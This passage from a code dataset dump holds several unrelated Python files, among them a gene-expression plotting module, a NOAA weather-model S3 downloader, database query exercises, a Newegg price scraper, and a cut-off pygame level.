list(set(degs_traditional).intersection(degs_specific))\n print(\n f\"No. 
of traditional DEGs that are specific by z-score criteria: {len(degs_intersect)}\"\n )\n\n # Get specific DEGs that were NOT found using traditional criteria\n degs_diff = list(set(degs_specific).difference(degs_intersect))\n print(\n f\"No. of specific DEGs that were not found by traditional criteria: {len(degs_diff)}\"\n )\n\n # Get intersection of DEGs using traditional and z-score criteria\n degs_intersect_generic = list(set(degs_traditional).intersection(degs_generic))\n print(\n f\"No. of traditional DEGs that are generic by z-score criteria: {len(degs_intersect_generic)}\"\n )\n\n # Save list of genes that interesect and those that do not\n merged_one_condition_df[\"Gene ID Name\"] = (\n merged_one_condition_df[\"Gene ID\"]\n + \" \"\n + merged_one_condition_df[f\"Gene Name_grp_{condition}\"].fillna(\"\")\n )\n\n # Set `Gene ID` as index\n merged_one_condition_df.set_index(\"Gene ID\", inplace=True)\n\n gene_id_names_intersect = merged_one_condition_df.loc[\n degs_intersect, \"Gene ID Name\"\n ]\n gene_id_names_diff = merged_one_condition_df.loc[degs_diff, \"Gene ID Name\"]\n gene_id_names_generic = merged_one_condition_df.loc[degs_generic, \"Gene ID Name\"]\n\n gene_lists_df = pd.DataFrame(\n {\n \"Traditional + specific DEGs\": gene_id_names_intersect,\n \"Specific only DEGs\": gene_id_names_diff,\n \"Generic DEGs\": gene_id_names_generic,\n }\n )\n\n return (\n gene_lists_df,\n degs_traditional,\n degs_specific,\n degs_generic,\n degs_intersect,\n degs_intersect_generic,\n degs_diff,\n )\n\n\ndef plot_volcanos(\n degs_intersect, degs_diff, merged_one_condition_df, condition, fig_title\n):\n \"\"\"\n Make volcano plots based on one condition from E-GEOD-33245. Color genes\n by gene lists created from `get_and_save_DEG_lists`\n\n Arguments\n ---------\n degs_intersect: list\n List of genes that were found to be DE using traditional criteria\n and were found to have a high z-score (specificity)\n degs_diff: list\n List of genes that were found to have a high log2 fold change and\n high z-score but were not found to be DE using traditional criteria\n merged_one_condition_df: df\n df of results for one of the E-GEOD-33245 conditions ('1v2', '1v3', '1v4' or '1v5')\n returned from `merge_abs_raw_dfs`\n condition: str\n Condition from E-GEOD-33245 associated with 'merged_one_condition_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n fig_title: str\n Title to describe condition\n \"\"\"\n fig, axes = plt.subplots(ncols=3, nrows=1, figsize=(15, 4))\n\n # Add columns for plotting\n merged_one_condition_df[\"FDR adjusted p-value plot\"] = -np.log10(\n merged_one_condition_df[f\"Adj P-value (Real)_grp_{condition}\"]\n )\n merged_one_condition_df[\"gene group\"] = \"none\"\n merged_one_condition_df.loc[\n degs_intersect, \"gene group\"\n ] = \"traditional + specific DEGs\"\n merged_one_condition_df.loc[degs_diff, \"gene group\"] = \"only specific DEGs\"\n\n colors = [\"lightgrey\", \"red\", \"blue\"]\n # Plot: log2FC vs p-value (traditional criteria)\n sns.scatterplot(\n data=merged_one_condition_df,\n x=f\"Test statistic (Real)_grp_{condition}_raw\",\n y=\"FDR adjusted p-value plot\",\n hue=\"gene group\",\n hue_order=[\"none\", \"traditional + specific DEGs\", \"only specific DEGs\"],\n style=\"gene group\",\n markers={\n \"none\": \".\",\n \"traditional + specific DEGs\": \"o\",\n \"only specific DEGs\": \"o\",\n },\n palette=colors,\n linewidth=0,\n alpha=0.5,\n ax=axes[0],\n )\n\n # Plot: log2FC vs z-score\n sns.scatterplot(\n data=merged_one_condition_df,\n x=f\"Test statistic 
(Real)_grp_{condition}_raw\",\n y=f\"abs(Z score)_grp_{condition}\",\n hue=\"gene group\",\n hue_order=[\"none\", \"traditional + specific DEGs\", \"only specific DEGs\"],\n style=\"gene group\",\n markers={\n \"none\": \".\",\n \"traditional + specific DEGs\": \"o\",\n \"only specific DEGs\": \"o\",\n },\n palette=colors,\n linewidth=0,\n alpha=0.5,\n ax=axes[1],\n )\n\n # Plot: z-score vs p-value\n sns.scatterplot(\n data=merged_one_condition_df,\n x=f\"abs(Z score)_grp_{condition}\",\n y=\"FDR adjusted p-value plot\",\n hue=\"gene group\",\n hue_order=[\"none\", \"traditional + specific DEGs\", \"only specific DEGs\"],\n style=\"gene group\",\n markers={\n \"none\": \".\",\n \"traditional + specific DEGs\": \"o\",\n \"only specific DEGs\": \"o\",\n },\n palette=colors,\n linewidth=0,\n alpha=0.5,\n ax=axes[2],\n )\n\n # Add labels\n fig.suptitle(fig_title, fontsize=16)\n axes[0].set_xlabel(\"log$_2$ Fold Change\")\n axes[1].set_xlabel(\"log$_2$ Fold Change\")\n axes[2].set_xlabel(\"Z-score\")\n axes[0].set_ylabel(\"FDR adjusted p-value\")\n axes[1].set_ylabel(\"Z-score\")\n axes[2].set_ylabel(\"FDR adjusted p-value\")\n axes[0].set_title(\"log$_2$ Fold Change vs p-value\")\n axes[1].set_title(\"log$_2$ Fold Change vs z-score\")\n axes[2].set_title(\"z-score vs p-value\")\n print(fig)\n\n\ndef plot_venn(degs_traditional, degs_specific, degs_generic):\n \"\"\"\n Create venn diagram to compare the genes that were found\n to be DE using traditional criteria vs genes that are\n specific (i.e. high z-score) or generic (i.e. low z-score)\n\n Arguments\n ---------\n degs_traditional: list\n List of genes found to pass traditional DE criteria\n (log2FC > 1 and FDR adjusted p-value < 0.05).\n degs_specific: list\n List of genes that were found to have log2 FC > 1\n and z-score > 4.44\n degs_generic: list\n List of genes that were found to have log2 FC > 1\n and z-score < 4.44\n \"\"\"\n fig, axes = plt.subplots(ncols=2, nrows=1, figsize=(15, 4))\n\n venn2(\n [set(degs_traditional), set(degs_specific)],\n set_labels=(\"Traditional\", \"Specific\"),\n ax=axes[0],\n )\n\n venn2(\n [set(degs_traditional), set(degs_generic)],\n set_labels=(\"Traditional\", \"Generic\"),\n ax=axes[1],\n )\n\n","repo_name":"greenelab/core-accessory-interactome","sub_path":"6_common_genes_analysis/find_common_DEGs/generic_expression_patterns_modules/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":30199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34715303585","text":"# -*- coding:utf-8 -*-\nfrom Login import *\nfrom lib_utils import *\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nconfig = ConfigParser.ConfigParser()\npath = os.path.join(os.path.dirname(__file__), '../../config/common.ini')\nconfig.read(path)\n\nshop_urn = config.get(\"common_urn\", \"shop_urn\")\nhome_urn = config.get(\"common_urn\", \"home_urn\")\ncontact = config.get(\"common_account\", \"contact\")\npassword = config.get(\"common_account\", \"password\")\ndomain = config.get(\"common_account\", \"domain\")\ninvite_code = config.get(\"common_account\", \"invite_code\")\ndb_service_config = json.loads(config.get(\"common_db\", \"db_service_config\"))\ndb_shop_config = json.loads(config.get(\"common_db\", \"db_shop_config\"))\nlogin_url = config.get(\"common_url\", \"login_url\")\nhome_page_url = 'https://' + domain + home_urn\nmyshoplaza_url = 'https://' + domain + shop_urn\n\n\nimg = \"http://120.79.196.159:8000/RF/logs/module/result.png\"\n# 获取图片\nimgs = 
upload_oss_py(img)[0]\npath_img = \"//cn.cdn.shoplazza.com/\" + upload_oss_py(img)[0]\n# image = {\"lastModified\": \"1520929852000\", \"lastModifiedDate\": \"2018-03-13T08:30:52.000Z\", \"name\": imgs,\n# \"originFileObj\": {\"uid\": \"rc-upload-1535093594875-2\"}, \"path\": imgs, \"percent\": \"100.00\",\n# \"status\": \"done\", \"type\": \"image/jpeg\", \"uid\": \"rc-upload-1535093594875-2\", \"url\": path_img}\nimage = {\"path\": imgs, \"alt\": \"\", \"aspect_ratio\": \"1.3333333333333333\", \"height\": \"504\", \"src\": path_img,\n \"width\": \"672\", \"size\": \"53455\"}\n\nlogin = Login()\ninit_cookie = {'b_cookie': login.login_b_py(), 'c_cookie': login.login_c_py()}\n","repo_name":"hama/RF_Project","sub_path":"lib/customlib/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38838333988","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport glob\nimport os.path\nimport sys\nimport time\nfrom datetime import datetime\nimport multiprocessing as mp\nfrom multiprocessing import Process\nfrom pathlib import Path\n\nimport numpy as np\nimport s3fs\nfrom boto3 import client\nfrom botocore import UNSIGNED\nfrom botocore.client import Config\n\n\"\"\"\n download_s3_file\n downloads the nwp file\n\n ARGS:\n bucket: f string ::\n ingest_path : fstring :: file that has been downloaded\n output_path : fstring :: where you want file stored\n\n RETURNS:\n\n \"\"\"\n\n\ndef download_s3_file(bucket, ingest_path, output_path):\n fs = s3fs.S3FileSystem(anon=True, asynchronous=False)\n\n if fs.exists(f\"{bucket}/{ingest_path}\"):\n # Download file, will throw FileNotFoundError if non existent\n fs.download(f\"{bucket}/{ingest_path}\", output_path)\n print(f\"✅ downloading {ingest_path} & saving to {output_path}\")\n else:\n print(f\"‼️ file not found {ingest_path}\")\n\n\n\"\"\"\nlist_s3_files\nreturns a list of files that have been downloaded for nwp\n\n ARGS:\n bucket\n model : string :: the model to be downloaded\n date : fstring :: year-month-day\n init_time : double :: 00\n data_type : string :: file format\n\n RETURNS:\n list :: the files that exist from dowload in a list\n\n \"\"\"\n\n\ndef list_s3_files(bucket, model, date, init_time, data_type):\n conn = client(\"s3\", config=Config(signature_version=UNSIGNED))\n\n if model == \"nam\":\n prefix = f\"{model}.{date}/\"\n elif model == \"gfs\":\n prefix = f\"{model}.{date}/{init_time}/atmos/\"\n elif model == \"hrrr\":\n prefix = f\"{model}.{date}/conus/\"\n\n response = conn.list_objects_v2(\n Bucket=bucket, Prefix=f\"{prefix}{model}.t{init_time}z.{data_type}\"\n )\n files = response.get(\"Contents\")\n if files:\n all_files = [file.get(\"Key\") for file in files]\n existing_files_for_download = [\n file\n for file in all_files\n if f\"t{init_time}z.{data_type}\" in file\n and not file.endswith(\"idx\")\n and not file.endswith(\"anl\")\n ]\n existing_files_for_download.sort()\n return existing_files_for_download\n else:\n return []\n\n\n\"\"\"\nget_avail_files\n\n ARGS:\n s3_bucket\n model : string :: the model to be downloaded\n year : string :: 0000\n month : string :: 00\n day : string :: 00\n init_time : double :: 00\n data_type : string :: file format\n split_loc:\n fh_loc:\n fxx_max:\n zfill:\n download_dir: fstring :: directory path where you want the data to be downloaded\n\n fname_out: string :: part of datapath name to be saved in your directory\n\n fname_end: string :: part of datapath name\n 
full_filelist_len:\n\n RETURNS:\n the files that exist for dowload\n\n \"\"\"\n\n\ndef get_avail_files(\n s3_bucket,\n model,\n year,\n month,\n day,\n init_time,\n data_type,\n split_loc,\n fh_loc,\n fxx_max,\n zfill,\n download_dir,\n fname_out,\n fname_end,\n full_filelist_len,\n):\n ii = 0\n len_files_for_download = [0]\n while True:\n files_for_download = list_s3_files(\n s3_bucket, model, f\"{year}{month}{day}\", init_time, data_type\n )\n files_for_download = [\n file\n for file in files_for_download\n if int(file.split(\".\")[split_loc][fh_loc:]) <= fxx_max\n ]\n print(files_for_download)\n len_files_for_download.append(len(files_for_download))\n for file in files_for_download:\n fxx = file.split(\".\")[split_loc][fh_loc:]\n if not os.path.isdir(download_dir):\n print(\"making directory: \", download_dir)\n Path(download_dir).mkdir(parents=True, exist_ok=True)\n # check to see if output_path is a directory. if not, create directory\n output_path = f\"{download_dir}{fname_out}{str(fxx).zfill(zfill)}{fname_end}\"\n if not os.path.exists(output_path):\n # if the file already exists, do not redownload\n download_s3_file(s3_bucket, file, output_path)\n # call the rest of the pipeline here, run_pipeline\n # running cleaning through the pipeline could be the \"sleep\" period\n print(\"FXX IS: \", fxx)\n else:\n print(f\"file has already been downloaded: {output_path}\")\n\n # STOP WHILE LOOP IF ALL DESIRED FILES HAVE BEEN DOWNLOADED ON OUR SIDE\n if os.path.isdir(download_dir):\n files_downloaded = glob.glob(f\"{download_dir}{fname_out}*{fname_end}\")\n num_files_downloaded = len(files_downloaded)\n print(num_files_downloaded)\n if num_files_downloaded >= full_filelist_len:\n print(\"exiting from while loop\")\n break\n\n # if no additional files are available compared to last try but the full_filelist_len has not been reached yet...\n if len_files_for_download[-1] == len_files_for_download[-2]:\n ii += 1\n print(\"same number of available files as last try. 
ii=\", ii)\n if (\n ii > 10\n ): # stop waiting for additional file if we have tried 10 separate times\n print(\"waited too long for new file, exiting while loop\")\n break\n\n # try again in 90 seconds\n print(\"sleep: \", datetime.now())\n time.sleep(90)\n\n\n# main\ndef main(model, data_type, init_date, init_time):\n month = str(init_date.month).zfill(2)\n print(\"Month: \", month)\n year = init_date.year\n print(\"Year\", year)\n day = str(init_date.day).zfill(2)\n\n # where you want the files to download\n download_dir = f\"/home/aevans/ai2es/{model.upper()}/{year}/{month}/\"\n print(\"Downloand_dir: \", download_dir)\n\n if model == \"nam\":\n s3_bucket = f\"noaa-{model}-pds\"\n else:\n s3_bucket = f\"noaa-{model}-bdp-pds\"\n\n if model == \"nam\":\n fxx_max = 84\n split_loc, fh_loc = -3, -2\n fname_out = f\"nam_218_{year}{month}{day}_{init_time}00_\"\n fname_end = \".grb2\"\n zfill = 3\n full_filelist_len = len(\n np.arange(0, 37, 1).tolist() + np.arange(39, 85, 3).tolist()\n )\n elif model == \"gfs\":\n fxx_max = 96\n split_loc, fh_loc = -1, 1\n fname_out = f\"gfs_4_{year}{month}{day}_{init_time}00_\"\n fname_end = \".grb2\"\n zfill = 3\n full_filelist_len = len(np.arange(0, 99, 3))\n elif model == \"hrrr\":\n fxx_max = 18\n split_loc, fh_loc = -2, -2\n fname_out = f\"{year}{month}{day}_hrrr.t{init_time}z.wrfsfcf\"\n fname_end = \".grib2\"\n zfill = 2\n full_filelist_len = len(range(0, 19))\n\n get_avail_files(\n s3_bucket,\n model,\n year,\n month,\n day,\n init_time,\n data_type,\n split_loc,\n fh_loc,\n fxx_max,\n zfill,\n download_dir,\n fname_out,\n fname_end,\n full_filelist_len,\n )\n\n print(\n f\"full download for {init_time}z initialization of the {model.upper()} complete!\"\n )\n\n\n# multiprocessing v2\n# good for bulk cleaning\nmodels = [\"gfs\", \"hrrr\", \"nam\"]\ndata_type_dict = {\"gfs\": \"pgrb2.0p50\", \"nam\": \"awphys\", \"hrrr\": \"wrfsfc\"}\ninit_time = \"00\"\n\n\nfor model in models:\n for month in np.arange(1, 13):\n init_date = datetime(2022, month, 1)\n\n # Step 1: Init multiprocessing.Pool()\n pool = mp.Pool(mp.cpu_count())\n init_date = datetime(2022, month, 1)\n\n # Step 2: `pool.apply` the `howmany_within_range()`\n results = pool.apply(\n main, args=(model, data_type_dict.get(model), init_date, init_time)\n )\n\n # Step 3: Don't forget to close\n pool.close()\n","repo_name":"shmaronshmevans/nwp_bias","sub_path":"src/bias/s3_download.py","file_name":"s3_download.py","file_ext":"py","file_size_in_byte":7673,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"35249860450","text":"#68. ソート\n\nimport json\nfrom pymongo import MongoClient\nfrom pymongo import DESCENDING\nclient = MongoClient('localhost', 27017)\n\ndb = client.kyoko\nco = db.nlp_collection\n\ndata = co.find({\"tags.value\": \"dance\"})\nsort = data.sort(\"rating.count\", DESCENDING)\n\nfor index, value in enumerate(sort, start = 1):\n print(\"{}\\t{}\".format(index, value.get(\"name\")))\n if index == 10:\n break\n","repo_name":"Akai-Kumako/100knock","sub_path":"Chapter7/68.py","file_name":"68.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"684390726","text":"#!/usr/bin/env python3\n\"\"\" Module for storing the sum_list() method definition. \"\"\"\nfrom typing import List\n\n\ndef sum_list(input_list: List[float]) -> float:\n \"\"\" Returns the adition of the given list of float numbers. 
\"\"\"\n a: float = 0.0\n for num in input_list:\n a += num\n return (a)\n","repo_name":"DiegoCol93/holbertonschool-web_back_end","sub_path":"0x00-python_variable_annotations/5-sum_list.py","file_name":"5-sum_list.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23361445733","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 10:21:03 2022\n\n@author: barbara\n\"\"\"\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport numpy as np\nimport os\nimport pandas as pd\nfrom scipy.signal import resample\nfrom abf_files_loader import load_abf\nfrom butter import lowpass\nfrom get_data import get_format_data\nfrom proof_read_gui import MiniSpontProof\nfrom txt_files_loader import load_txt\n\n\nroot = os.getcwd() + '/'\nresults_path = 'results/results.xlsx'\nrecording_dir = 'recordings/'\n\ncheck_excel = False\ntrials = 0\n\nwhile not check_excel:\n # get file name and channel to proof-read\n recording_file = input('Enter the file name: ')\n channel = input('Enter the channel number: ')\n\n # define the sheet_name\n if ('.abf' in recording_file) or ('.txt' in recording_file):\n sheet_name = recording_file[:-4] + '_' + channel\n else:\n print('Please, provide the file name with extention')\n trials += 1\n continue\n \n # try to load the results\n try:\n results = pd.read_excel(root + results_path, sheet_name=sheet_name)\n check_excel = True\n except ValueError:\n print('''Either the recording file or the channel was not found in the results.xlsx file. Please, try again.''')\n trials += 1\n if trials >= 5:\n exit()\n\n# try to load the summary results sheet\ntry:\n summary_results = pd.read_excel(root + results_path,\n sheet_name='Summary results')\nexcept ValueError:\n print('There is a problem with the results.xlsx file. Make sure there is a summary_results sheet')\n\n# the name of the recordings files should be speficied with extentions in the\n# metadata.xlsx file. 
The format that can be used are either abf or txt.\nif ('.abf' not in recording_file) and ('.txt' not in recording_file):\n print('The extention of the recording file (.abf or .txt) should be specified in the metadata.xlsx file')\n exit()\n \n# try to load the recording_file\nif '.abf' in recording_file:\n try:\n data = load_abf(root + recording_dir + recording_file)\n except FileNotFoundError:\n print('The recording file was not found')\n exit()\nif '.txt' in recording_file:\n try:\n data = load_txt(root + recording_dir + recording_file)\n except FileNotFoundError:\n print('The recording file was not found')\n exit() \n \n# get metadata\nfirst_sweep = summary_results.loc[(\n summary_results['Recording filename'] == recording_file) & (\n summary_results['Channel'] == int(channel)\n )]['Analysis start at sweep (number)']\n\nfirst_point = summary_results.loc[(\n summary_results['Recording filename'] == recording_file) & (\n summary_results['Channel'] == int(channel)\n )]['Cut sweeps first part (ms)']\n\nlast_point = summary_results.loc[(\n summary_results['Recording filename'] == recording_file) & (\n summary_results['Channel'] == int(channel)\n )]['Cut sweeps last part (ms)']\n\nanalysis_end = summary_results.loc[(\n summary_results['Recording filename'] == recording_file) & (\n summary_results['Channel'] == int(channel)\n )]['Analysis length (sec)']\n\nfs = summary_results.loc[(\n summary_results['Recording filename'] == recording_file) & (\n summary_results['Channel'] == int(channel)\n )]['Sampling rate (Hz)']\n\nfs = int(fs.iloc[0])\nanalysis_end = int(analysis_end.iloc[0] * fs)\n\nfor k, v in data.items():\n sweep_length = v[0].shape[0]\n \nfirst_sweep = int(first_sweep.iloc[0] - 1)\nfirst_point = int(first_point.iloc[0] * (fs / 1000))\nlast_point = int(sweep_length - last_point.iloc[0] * (fs / 1000))\n\n# try to get the relevant channel\nch = ['Ch' + str(channel)]\ndata = get_format_data(data, ch, first_sweep, first_point, last_point)\nif len(data) == 0:\n print('The channel was not found in the recording file.')\n exit()\n\n# get the portion of the recording been analyzed\nsignal = data[int(channel)]\nsignal = signal[:analysis_end]\n\n# resample the signal if fs != 20000\nif fs != 20000:\n signal = resample(signal, int(signal.shape[0] * 20000 / fs))\n\n# low pass filter the recording\nsignal_lp = lowpass(signal, 800, order=1)\n\n# get x, y coordinates of detected events\nx = np.array(results['x (ms)'])\ny = np.array(results['y (pA)'])\n\ntime = np.linspace(0,\n round(signal_lp.shape[0] / (fs / 1000)) - 1 / (fs / 1000),\n signal_lp.shape[0])\n\noriginal_values = np.array(list(zip(x, y)), dtype='object')\n\n# start the proof-reading\nmini_spont_proof = MiniSpontProof(root, results_path, sheet_name, time,\n signal_lp, original_values, fs)\n\n","repo_name":"Imbrosci/spontaneous-postsynaptic-currents-detection","sub_path":"proof_read_results.py","file_name":"proof_read_results.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29812770672","text":"from scipy.misc import imread\nimport numpy as np\nimport torch.nn as nn\nimport torch\nimport csv\nimport sys\nimport os\n\n\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(1, 64, kernel_size=4, stride=2, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=4, stride=2, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n )\n 
self.classifier = nn.Sequential(\n nn.Linear(64*7*7, 10),\n nn.Softmax(dim=1)\n )\n\n def forward(self, image):\n feature = self.conv(image)\n output = self.classifier(feature.view(feature.size(0), -1))\n return output\n\n\ndef main(directory, output_csv):\n checkpoint = torch.load('best_checkpoint.pth.tar', map_location=lambda storage, loc: storage)\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n model = CNN().to(device)\n model.load_state_dict(checkpoint['state_dict'])\n\n print(\"Selected checkpoint training acc: {:.6f} validation acc: {:.6f}\".format(\n checkpoint['accuracy'][checkpoint['epoch'] - 1],\n checkpoint['val_accuracy'][checkpoint['epoch'] - 1])\n )\n\n with torch.no_grad():\n model.eval()\n with open(output_csv, \"w\") as f:\n s = csv.writer(f, delimiter=',', lineterminator='\\n')\n s.writerow([\"id\", \"label\"])\n for imagefile in sorted(os.listdir(directory)):\n image = imread(os.path.join(directory, imagefile)) / 255\n image = np.expand_dims(image, axis=0)\n image = torch.tensor(image, dtype=torch.float, device=device).unsqueeze(0)\n\n output = model(image)\n result = torch.max(output, dim=1)[1]\n\n idx = os.path.splitext(os.path.basename(imagefile))[0]\n s.writerow([idx, result.item()])\n\n\nif __name__ == '__main__':\n directory = sys.argv[1]\n output_csv = sys.argv[2]\n main(directory, output_csv)\n","repo_name":"fanoping/Computer-Vision","sub_path":"hw2/hw2-3_test.py","file_name":"hw2-3_test.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"70157360441","text":"\nimport subprocess as sp\nimport json\n\nclass RpcEndPoint:\n def __init__(self,exeName):\n self.exeName = exeName\n self.next_id = 0\n \n def call_method(self,method,params):\n self.next_id = self.next_id + 1\n rpc_call = {'id':self.next_id, 'method': method, 'params': params}\n p1 = sp.Popen(self.exeName,stdin=sp.PIPE,stdout=sp.PIPE)\n outdata_json = p1.communicate(input=json.dumps(rpc_call))\n outdata=json.loads(outdata_json[0])\n if outdata['id'] != rpc_call['id']:\n raise Exception('rpc return id mismatch')\n if 'error' in outdata:\n raise Exception('service error',outdata['error'])\n \n return outdata['result']\n\n\n","repo_name":"baylisslabs/stratotune","sub_path":"src/bit.shared.testutil/jsonpiperpc.py","file_name":"jsonpiperpc.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42317321659","text":"#!/usr/bin/python3\n\"\"\"\nscript that lists all cities from the database hbtn_0e_4_usa\n\"\"\"\nimport MySQLdb\nfrom sys import argv\n\nif __name__ == '__main__':\n\n # Connect to the MySQL database\n db = MySQLdb.connect(host='localhost',\n port=3306,\n user=argv[1],\n passwd=argv[2],\n db=argv[3])\n\n # Create a cursor object to interact with the database\n cursor = db.cursor()\n\n # Use a prepared statement to avoid SQL injection\n query = \"SELECT cities.id, cities.name FROM cities \" \\\n \"JOIN states ON cities.state_id = states.id \" \\\n \"WHERE states.name LIKE BINARY %(state_name)s \" \\\n \"ORDER BY cities.id\"\n\n state_name = argv[4]\n\n # Execute the SQL query with a parameterized query\n cursor.execute(query, {\"state_name\": state_name})\n\n # Fetch all the rows and display them\n results = cursor.fetchall()\n\n # Check if there are results\n if results is not None:\n print(\", \".join([row[1] for row in results]))\n # Close the cursor and 
database connection\n cursor.close()\n db.close()\n","repo_name":"Shewanji/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4092682682","text":"import bs4\r\nfrom urllib.request import urlopen as openURL\r\nfrom bs4 import BeautifulSoup as soup\r\n\r\nproductDict = {'A': \"4k Monitors\", 'B': \"1TB SSDs\", 'C': \"Powerful Graphics Cards\"}\r\n\r\n\r\ndef getPage(url) -> [[\"item_container\"]]:\r\n \"\"\"open URL and returns its HTML code parsedPage\"\"\"\r\n pageList = []\r\n\r\n sortByRating = \"&Order=RATING\"\r\n pageSize = \"&PageSize=96\"\r\n pageNumber = \"&page=\"\r\n numPages = numOfProducts // 96 + 1\r\n for n in range(numPages):\r\n newUrl = url + sortByRating + pageSize + pageNumber + str(n + 1)\r\n webData = openURL(newUrl)\r\n webText = webData.read()\r\n webData.close()\r\n\r\n parsedPage = soup(webText, \"html.parser\")\r\n pageList.append(parsedPage.findAll(\"div\", {\"class\", \"item-container\"}))\r\n return pageList\r\n\r\n\r\ndef displayLowestPriceoftheBestRated(allPages: [[\"item_container\"]], productName: str, numOfProducts: int):\r\n \"\"\"find and display product with lowest price on page\"\"\"\r\n lowestPrice = -1\r\n lowestPriceTitle = \"\"\r\n processedProducts = 0\r\n for page in allPages: # loop through each page of 96 products per page\r\n for product in page: # look through all 96 products on page\r\n if processedProducts == numOfProducts: # if searched num is what user asked for, we are done\r\n break\r\n\r\n allStrongs = product.findAll(\"strong\") # price is in one of the strong sections\r\n title = product.find(\"a\", {\"class\", \"item-title\"}) # title is found here with .text tag\r\n\r\n price = 0\r\n for sub in allStrongs:\r\n try:\r\n price = int(sub.string) # if doesnt error, price is now the price for this product\r\n except ValueError:\r\n continue\r\n\r\n if price != 0 and price < lowestPrice or lowestPrice == -1:\r\n lowestPrice = price\r\n lowestPriceTitle = title\r\n\r\n processedProducts += 1\r\n\r\n print(f\"The cheapest product amongst the {numOfProducts} best rated {productName} on Newegg is:\\n\"\r\n f\" {lowestPriceTitle.text}\\n Price: ${str(lowestPrice)}\\n\")\r\n\r\n\r\nif __name__ == '__main__':\r\n productSelection = input(\"Which product(s) would you like to look at?\\n\" +\r\n \" A) 4k Monitors\\n\" +\r\n \" B) 1TB SSDs\\n\" +\r\n \" C) Powerful Graphics Cards\\n\" +\r\n \" D) All of the above\\n\").strip().upper()\r\n while True:\r\n try:\r\n numOfProducts = int(input(\"How many of the top products would you like to process?\\n\"))\r\n if numOfProducts > 0:\r\n break\r\n except ValueError:\r\n \"do nothing\"\r\n print(\"Please enter a valid positive integer.\")\r\n\r\n if productSelection in 'AD':\r\n FourKmonitorUrlRating = \"https://www.newegg.com/p/pl?N=100160979%20601305587\"\r\n displayLowestPriceoftheBestRated(getPage(FourKmonitorUrlRating), productDict['A'], numOfProducts)\r\n\r\n if productSelection in 'BD':\r\n SSD_1TBUrlRating = \"https://www.newegg.com/p/pl?N=100011693%20600414920\"\r\n displayLowestPriceoftheBestRated(getPage(SSD_1TBUrlRating), productDict['B'], numOfProducts)\r\n\r\n if productSelection in 'CD':\r\n bestGPUsUrlRating = \"https://www.newegg.com/p/pl?N=100007709%20601321572%20600419577%20600565061%20601202919\" \\\r\n 
\"%20601203927%20601305993%20601203901%20601294835%20601295933%20601194948%20601330988\" \\\r\n \"%20601329884\"\r\n displayLowestPriceoftheBestRated(getPage(bestGPUsUrlRating), productDict['C'], numOfProducts)\r\n","repo_name":"mb19902/Newegg-Web-Scrape","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26540417797","text":"'''\n1. 처음 마이너스부터 다음 마이너스가 오기 전까지 + 는 모두 더해줘야 최소값이 나온다.\n2. 따라서, -를 기준으로 시작괄호를 열고, 다음 -가 나온다면 그때 괄호를 닫아주자.\n'''\n\n\nstring = input()\nsliceList = list(string.split('-'))\n\ntotalList = []\ntotalSum = 0\n\n# -로 구분한 문자열 리스트를 for문 돈다.\nfor i in sliceList:\n # +가 있는 문자열이라면 +로 split 해준다, split된 plustList는 모두 더해져 totalList에 더해진다.\n if '+' in i:\n plusList = list(map(int, i.split('+')))\n cnt = cnt(plusList)\n totalList.append(cnt)\n # +가 없는 문자열이라면 그냥 totalLIst에 더해준다.\n else:\n totalList.append(int(i))\n\n# totalList의 0번 인덱스를 totalSum으로 세팅, 나머지는 다 빼준다.\nfor i in range(len(totalList)):\n if i == 0:\n totalSum = totalList[i]\n else:\n totalSum -= totalList[i]\n\nprint(totalSum)","repo_name":"kkkapuq/AlgorithmStudy","sub_path":"Python/220708_BOJ_1541_잃어버린 괄호/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22626405924","text":"import sys\nsys.path.insert(0,'../')\nfrom levels import levels\nfrom constants import w_width, w_height, wolfPath, bearPath,colors\nimport enemy, items, backgrounds,sounds\nimport random, pygame, math, json\n\nclass level(levels):\n\n def __init__(self, screen):\n levels.__init__(self,screen)\n self.screen = screen\n # where the player will start on this level\n self.startingPosX = 600\n self.startingPosY = 350\n self.soundFX = sounds.SoundFX()\n \n with open('assets/images/levelTwo/level2obstacles.json','rb') as obstacles:\n self.obstacleCoords = json.load(obstacles)\n self.obstacleCoords['tm']= {\"x\": 500, \"y\": 300, \"height\": 150, \"width\": 150, \"path\": 